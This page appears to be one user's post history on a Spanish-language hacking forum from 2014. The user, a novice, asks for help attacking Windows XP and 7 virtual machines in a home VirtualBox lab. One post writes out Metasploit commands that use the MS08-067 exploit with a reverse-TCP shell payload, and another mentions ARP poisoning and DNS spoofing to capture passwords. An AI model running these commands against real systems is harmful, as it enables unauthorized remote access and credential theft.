elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


  Mostrar Mensajes
Páginas: 1 2 [3]
21  Seguridad Informática / Bugs y Exploits / Re: BackDoor - Problema al no poder salir de mi Red LAN en: 18 Febrero 2014, 16:14 pm
Asi es mi estimado, intenta hacerlo con maquinas reales, conectadas a tu moden en una red LAN o pide prestada una laptop, y veras que te funciona, o si estas en VirtualBox pon tus maquinas virtuales en modo Bridged
22  Seguridad Informática / Bugs y Exploits / Re: Metasploit en: 18 Febrero 2014, 16:10 pm
Asi es mi estimado, use un payload de windows shell para conexion reversa y poder robar sesion de windows, si me pudieras ayudar sobre que especificar y como, ya que especifico antes de atacar siempre pongo mi puerto e ip con el puerto e ip de la victima, no se que mas tenga que especificar, te agradeceria que me lo hicieras saber.
23  Seguridad Informática / Bugs y Exploits / Re: Metasploit en: 26 Enero 2014, 21:06 pm
Uso Virtual Box, lo que pasa que en YouTube hay videos donde realizan ataques con armitage, y tambien manualmente con el Metasploid, haciendose de una shell windows, en estas mismas maquinas virtuales, y hasta ahora no me a funcionado ni en NAT ni en Bridgeb.


Ayuendeme de cual es el problema, hago escaneo con nmap y me aparecen mis maquinas fisicas en el kali virtual, pero la otra PC con WinXp que es virtual tambien, no me aparece.

Tambien cuando ataco la mia que tiene Win7 Ultimate, me sale el siguiente error desde metasploit, me imagino que es por que no es vulnerable a este tipo de ataque, ustedes que opinan sobre este otro tema...
24  Seguridad Informática / Bugs y Exploits / Re: Metasploit en: 24 Enero 2014, 20:15 pm
Ok intentare los ataques desde una PC fisica, y posteriormente voy a postear los resultados obtenidos, muchas gracias.
25  Seguridad Informática / Bugs y Exploits / Re: Metasploit en: 24 Enero 2014, 19:55 pm
Pues ya realize desde una de mis maquinas con backtrack 5 hice un ataque DNS Spoffing y envenenamiento de ARP para obtener claves de mi maquina tangible, osea la principal, y si me funciono, pero agradeceria si alguien me hace saber algun metodo que pueda yo utlizar, y pues escanear bulnerabilidades con nmap desde backtrack, y que ataques conocen para una red local???????????
 :-(

Porfavor algun ataque para una red local, que yo pueda probar en mi pequeña red? :huh:
26  Seguridad Informática / Bugs y Exploits / Re: Metasploit en: 24 Enero 2014, 19:50 pm
Amigo tiene apenas 1 dia de que lo tengo instalado, pero de ser asi lo reinstalo, es un XP SP 3
Pero mi moden tengo abiertos los puertos, y yo creo que debe de haber alguna manera para poder penetrar en la maquina, no importa si esta actualizado, por eso mismo posteo mi duda, haber si alguien conoce alguna forma de hackear ese Xp sp3 o windows 7 desde backtrack 5 o kali linux desde metasploit o alguna otra manera, la que sea no importa solo quiero aprender alguna que sea exitosa
 :-(
27  Seguridad Informática / Bugs y Exploits / Metasploit en: 24 Enero 2014, 19:26 pm
Hola muye buenas tardes. :D
Espero puedan ayudarme, ya que me concidero novato y me gusta mucho aprender.

Tengo en una maquina virtual montado Kali Linux y en otra Backtrack 5 r3 y en la tercera tengo Win Xp y e estado intentando hacerme de una windows shell dentro de la que tiene WinXP desde kali y backtrack, pero hasta ahora solo e logrado fracasar, no me e rendido, pero si me pudieran guiar, explicar o proporcionar algun otro metedo.
lo e estado intentando con el PAYLOAD desde MSFCONSOLE, tambien con ARMITAGE e usado tambien estos comandos que les escribire tal cual los use:
 :huh:
use exploit/windows/smb/ms08_067_netapi
set RHOST 000.000.000.000  <-----Ip a atacar
set payload windows/shell/reverse_tcp
set LHOST 000.000.000.000   <----Ip atacante
exploit

Pero tampoco dan resultado, simplemente no carga el exploit, o me dice algo del packete en ingles, o (no-targget), pero siempre ingreso la ip de la victima que en este caso es mi otra maquina virtual, las tres maquinas las tengo en modo britged, (adaptador puente)desde VBox


Ayudame por favor
*****************************************************************************
Páginas: 1 2 [3]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines